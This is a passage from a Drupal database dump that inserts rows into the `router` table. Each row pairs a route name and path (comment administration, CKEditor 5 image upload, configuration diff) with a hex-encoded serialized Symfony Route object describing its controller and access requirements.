3b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33353a227b5e2f61646d696e2f636f6e6669672f70656f706c652f63617074636861247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32383a222f61646d696e2f636f6e6669672f70656f706c652f63617074636861223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a32383a222f61646d696e2f636f6e6669672f70656f706c652f63617074636861223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('ckeditor5.media_entity_metadata', '/ckeditor5/{editor}/media-entity-metadata', '/ckeditor5/%/media-entity-metadata', 5, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34313a222f636b656469746f72352f7b656469746f727d2f6d656469612d656e746974792d6d65746164617461223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a37343a225c44727570616c5c636b656469746f72355c436f6e74726f6c6c65725c434b456469746f72354d65646961436f6e74726f6c6c65723a3a6d65646961456e746974794d65746164617461223b7d733a31323a22726571756972656d656e7473223b613a333a7b733a31343a225f656e746974795f616363657373223b733a31303a22656469746f722e757365223b733a31343a225f637573746f6d5f616363657373223b733a36313a225c44727570616c5c636b656469746f72355c436f6e74726f6c6c65725c434b456469746f72354d65646961436f6e74726f6c6c65723a3a616363657373223b733a31313a225f637372665f746f6b656e223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a363a22656469746f72223b613a323a7b733a343a2274797065223b733a31333a22656e746974793a656469746f72223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a333a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b693a313b733a31393a226163636573735f636865636b2e637573746f6d223b693a323b733a31373a226163636573735f636865636b2e63737266223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a313a7b693a303b733a333a22474554223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a363a22656469746f72223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a36303a227b5e2f636b656469746f72352f283f503c656469746f723e5b5e2f5d2b2b292f6d656469615c2d656e746974795c2d6d65746164617461247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32323a222f6d656469612d656e746974792d6d65746164617461223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a363a22656469746f72223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f636b656469746f7235223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a363a22656469746f72223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a353b733a31343a227061747465726e4f75746c696e65223b733a33343a222f636b656469746f72352f252f6d656469612d656e746974792d6d65746164617461223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('ckeditor5.upload_image', '/ckeditor5/upload-image/{editor}', '/ckeditor5/upload-image/%', 6, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33323a222f636b656469746f72352f75706c6f61642d696d6167652f7b656469746f727d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a36313a225c44727570616c5c636b656469746f72355c436f6e74726f6c6c65725c434b456469746f7235496d616765436f6e74726f6c6c65723a3a75706c6f6164223b7d733a31323a22726571756972656d656e7473223b613a333a7b733a31343a225f656e746974795f616363657373223b733a31303a22656469746f722e757365223b733a31343a225f637573746f6d5f616363657373223b733a37393a225c44727570616c5c636b656469746f72355c436f6e74726f6c6c65725c434b456469746f7235496d616765436f6e74726f6c6c65723a3a696d61676555706c6f6164456e61626c6564416363657373223b733a31313a225f637372665f746f6b656e223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a363a22656469746f72223b613a323a7b733a343a2274797065223b733a31333a22656e746974793a656469746f72223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a333a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b693a313b733a31393a226163636573735f636865636b2e637573746f6d223b693a323b733a31373a226163636573735f636865636b2e63737266223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a313a7b693a303b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a363a22656469746f72223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35303a227b5e2f636b656469746f72352f75706c6f61645c2d696d6167652f283f503c656469746f723e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a363a22656469746f72223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a32333a222f636b656469746f72352f75706c6f61642d696d616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a363a22656469746f72223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a363b733a31343a227061747465726e4f75746c696e65223b733a32353a222f636b656469746f72352f75706c6f61642d696d6167652f25223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('comment.admin', '/admin/content/comment', '/admin/content/comment', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32323a222f61646d696e2f636f6e74656e742f636f6d6d656e74223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a353a7b733a31313a225f636f6e74726f6c6c6572223b733a34373a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a68616e646c65223b733a31353a225f7469746c655f63616c6c6261636b223b733a34393a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a6765745469746c65223b733a373a22766965775f6964223b733a373a22636f6d6d656e74223b733a31303a22646973706c61795f6964223b733a31343a22706167655f7075626c6973686564223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a313b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a31393a2261646d696e697374657220636f6d6d656e7473223b733a373a225f666f726d6174223b733a343a2268746d6c223b7d733a373a226f7074696f6e73223b613a393a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31383a225f766965775f617267756d656e745f6d6170223b613a303a7b7d733a32333a225f766965775f646973706c61795f706c7567696e5f6964223b733a343a2270616765223b733a32363a225f766965775f646973706c61795f706c7567696e5f636c617373223b733a33383a2244727570616c5c76696577735c506c7567696e5c76696577735c646973706c61795c50616765223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a313b733a31363a2272657475726e735f726573706f6e7365223b623a303b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32393a227b5e2f61646d696e2f636f6e74656e742f636f6d6d656e74247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32323a222f61646d696e2f636f6e74656e742f636f6d6d656e74223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32323a222f61646d696e2f636f6e74656e742f636f6d6d656e74223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('comment.admin_approval', '/admin/content/comment/approval', '/admin/content/comment/approval', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33313a222f61646d696e2f636f6e74656e742f636f6d6d656e742f617070726f76616c223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a353a7b733a31313a225f636f6e74726f6c6c6572223b733a34373a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a68616e646c65223b733a31353a225f7469746c655f63616c6c6261636b223b733a34393a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a6765745469746c65223b733a373a22766965775f6964223b733a373a22636f6d6d656e74223b733a31303a22646973706c61795f6964223b733a31353a22706167655f756e617070726f766564223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a313b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a31393a2261646d696e697374657220636f6d6d656e7473223b733a373a225f666f726d6174223b733a343a2268746d6c223b7d733a373a226f7074696f6e73223b613a393a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31383a225f766965775f617267756d656e745f6d6170223b613a303a7b7d733a32333a225f766965775f646973706c61795f706c7567696e5f6964223b733a343a2270616765223b733a32363a225f766965775f646973706c61795f706c7567696e5f636c617373223b733a33383a2244727570616c5c76696577735c506c7567696e5c76696577735c646973706c61795c50616765223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a313b733a31363a2272657475726e735f726573706f6e7365223b623a303b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33383a227b5e2f61646d696e2f636f6e74656e742f636f6d6d656e742f617070726f76616c247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33313a222f61646d696e2f636f6e74656e742f636f6d6d656e742f617070726f76616c223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a33313a222f61646d696e2f636f6e74656e742f636f6d6d656e742f617070726f76616c223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('comment.approve', '/comment/{comment}/approve', '/comment/%/approve', 5, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32363a222f636f6d6d656e742f7b636f6d6d656e747d2f617070726f7665223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a333a7b733a363a225f7469746c65223b733a373a22417070726f7665223b733a31313a225f636f6e74726f6c6c6572223b733a36303a225c44727570616c5c636f6d6d656e745c436f6e74726f6c6c65725c436f6d6d656e74436f6e74726f6c6c65723a3a636f6d6d656e74417070726f7665223b733a31313a22656e746974795f74797065223b733a373a22636f6d6d656e74223b7d733a31323a22726571756972656d656e7473223b613a333a7b733a31343a225f656e746974795f616363657373223b733a31353a22636f6d6d656e742e617070726f7665223b733a31313a225f637372665f746f6b656e223b733a343a2254525545223b733a373a22636f6d6d656e74223b733a333a225c642b223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a373a22636f6d6d656e74223b613a323a7b733a343a2274797065223b733a31343a22656e746974793a636f6d6d656e74223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b693a313b733a31373a226163636573735f636865636b2e63737266223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a373a22636f6d6d656e74223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34303a227b5e2f636f6d6d656e742f283f503c636f6d6d656e743e5c642b292f617070726f7665247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a383a222f617070726f7665223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a333a225c642b223b693a333b733a373a22636f6d6d656e74223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a383a222f636f6d6d656e74223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a373a22636f6d6d656e74223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a353b733a31343a227061747465726e4f75746c696e65223b733a31383a222f636f6d6d656e742f252f617070726f7665223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('comment.multiple_delete_confirm', '/admin/content/comment/delete', '/admin/content/comment/delete', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32393a222f61646d696e2f636f6e74656e742f636f6d6d656e742f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a333a7b733a363a225f7469746c65223b733a363a2244656c657465223b733a353a225f666f726d223b733a34323a225c44727570616c5c636f6d6d656e745c466f726d5c436f6e6669726d44656c6574654d756c7469706c65223b733a31343a22656e746974795f747970655f6964223b733a373a22636f6d6d656e74223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33303a225f656e746974795f64656c6574655f6d756c7469706c655f616363657373223b733a373a22636f6d6d656e74223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33353a226163636573735f636865636b2e656e746974795f64656c6574655f6d756c7469706c65223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33363a227b5e2f61646d696e2f636f6e74656e742f636f6d6d656e742f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f636f6e74656e742f636f6d6d656e742f64656c657465223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a32393a222f61646d696e2f636f6e74656e742f636f6d6d656e742f64656c657465223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('comment.new_comments_node_links', '/comments/render_new_comments_node_links', '/comments/render_new_comments_node_links', 3, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34303a222f636f6d6d656e74732f72656e6465725f6e65775f636f6d6d656e74735f6e6f64655f6c696e6b73223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a37323a225c44727570616c5c636f6d6d656e745c436f6e74726f6c6c65725c436f6d6d656e74436f6e74726f6c6c65723a3a72656e6465724e6577436f6d6d656e74734e6f64654c696e6b73223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31343a2261636365737320636f6e74656e74223b7d733a373a226f7074696f6e73223b613a333a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34373a227b5e2f636f6d6d656e74732f72656e6465725f6e65775f636f6d6d656e74735f6e6f64655f6c696e6b73247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a34303a222f636f6d6d656e74732f72656e6465725f6e65775f636f6d6d656e74735f6e6f64655f6c696e6b73223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a333b733a31343a227061747465726e4f75746c696e65223b733a34303a222f636f6d6d656e74732f72656e6465725f6e65775f636f6d6d656e74735f6e6f64655f6c696e6b73223b733a383a226e756d5061727473223b693a323b7d7d, 2);
INSERT INTO `router` (`name`, `path`, `pattern_outline`, `fit`, `route`, `number_parts`) VALUES
('comment.node_redirect', '/comment/{node}/reply', '/comment/%/reply', 5, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32313a222f636f6d6d656e742f7b6e6f64657d2f7265706c79223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a35383a225c44727570616c5c636f6d6d656e745c436f6e74726f6c6c65725c436f6d6d656e74436f6e74726f6c6c65723a3a72656469726563744e6f6465223b7d733a31323a22726571756972656d656e7473223b613a333a7b733a31343a225f656e746974795f616363657373223b733a393a226e6f64652e76696577223b733a32303a225f6d6f64756c655f646570656e64656e63696573223b733a343a226e6f6465223b733a343a226e6f6465223b733a333a225c642b223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a343a226e6f6465223b613a323a7b733a343a2274797065223b733a31313a22656e746974793a6e6f6465223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a343a226e6f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33353a227b5e2f636f6d6d656e742f283f503c6e6f64653e5c642b292f7265706c79247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a363a222f7265706c79223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a333a225c642b223b693a333b733a343a226e6f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a383a222f636f6d6d656e74223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a343a226e6f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a353b733a31343a227061747465726e4f75746c696e65223b733a31363a222f636f6d6d656e742f252f7265706c79223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('comment.reply', '/comment/reply/{entity_type}/{entity}/{field_name}/{pid}', '/comment/reply/%/%/%', 24, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35363a222f636f6d6d656e742f7265706c792f7b656e746974795f747970657d2f7b656e746974797d2f7b6669656c645f6e616d657d2f7b7069647d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a333a7b733a31313a225f636f6e74726f6c6c6572223b733a35383a225c44727570616c5c636f6d6d656e745c436f6e74726f6c6c65725c436f6d6d656e74436f6e74726f6c6c65723a3a6765745265706c79466f726d223b733a363a225f7469746c65223b733a31353a22416464206e657720636f6d6d656e74223b733a333a22706964223b4e3b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f637573746f6d5f616363657373223b733a36313a225c44727570616c5c636f6d6d656e745c436f6e74726f6c6c65725c436f6d6d656e74436f6e74726f6c6c65723a3a7265706c79466f726d416363657373223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a363a22656e74697479223b613a323a7b733a343a2274797065223b733a32303a22656e746974793a7b656e746974795f747970657d223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e637573746f6d223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a343a7b693a303b733a31313a22656e746974795f74797065223b693a313b733a363a22656e74697479223b693a323b733a31303a226669656c645f6e616d65223b693a333b733a333a22706964223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3130383a227b5e2f636f6d6d656e742f7265706c792f283f503c656e746974795f747970653e5b5e2f5d2b2b292f283f503c656e746974793e5b5e2f5d2b2b292f283f503c6669656c645f6e616d653e5b5e2f5d2b2b29283f3a2f283f503c7069643e5b5e2f5d2b2b29293f247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a333a22706964223b693a343b623a313b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31303a226669656c645f6e616d65223b693a343b623a313b7d693a323b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a363a22656e74697479223b693a343b623a313b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31313a22656e746974795f74797065223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a31343a222f636f6d6d656e742f7265706c79223b7d7d733a393a22706174685f76617273223b613a343a7b693a303b733a31313a22656e746974795f74797065223b693a313b733a363a22656e74697479223b693a323b733a31303a226669656c645f6e616d65223b693a333b733a333a22706964223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a32343b733a31343a227061747465726e4f75746c696e65223b733a32303a222f636f6d6d656e742f7265706c792f252f252f25223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('config.diff', '/admin/config/development/configuration/sync/diff/{source_name}/{target_name}', '/admin/config/development/configuration/sync/diff/%', 126, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37373a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f636f6e66696775726174696f6e2f73796e632f646966662f7b736f757263655f6e616d657d2f7b7461726765745f6e616d657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a34383a225c44727570616c5c636f6e6669675c436f6e74726f6c6c65725c436f6e666967436f6e74726f6c6c65723a3a64696666223b733a31313a227461726765745f6e616d65223b4e3b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32353a2273796e6368726f6e697a6520636f6e66696775726174696f6e223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31313a22736f757263655f6e616d65223b693a313b733a31313a227461726765745f6e616d65223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3130393a227b5e2f61646d696e2f636f6e6669672f646576656c6f706d656e742f636f6e66696775726174696f6e2f73796e632f646966662f283f503c736f757263655f6e616d653e5b5e2f5d2b2b29283f3a2f283f503c7461726765745f6e616d653e5b5e2f5d2b2b29293f247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31313a227461726765745f6e616d65223b693a343b623a313b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31313a22736f757263655f6e616d65223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a34393a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f636f6e66696775726174696f6e2f73796e632f64696666223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31313a22736f757263655f6e616d65223b693a313b733a31313a227461726765745f6e616d65223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132363b733a31343a227061747465726e4f75746c696e65223b733a35313a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f636f6e66696775726174696f6e2f73796e632f646966662f25223b733a383a226e756d5061727473223b693a383b7d7d, 8),
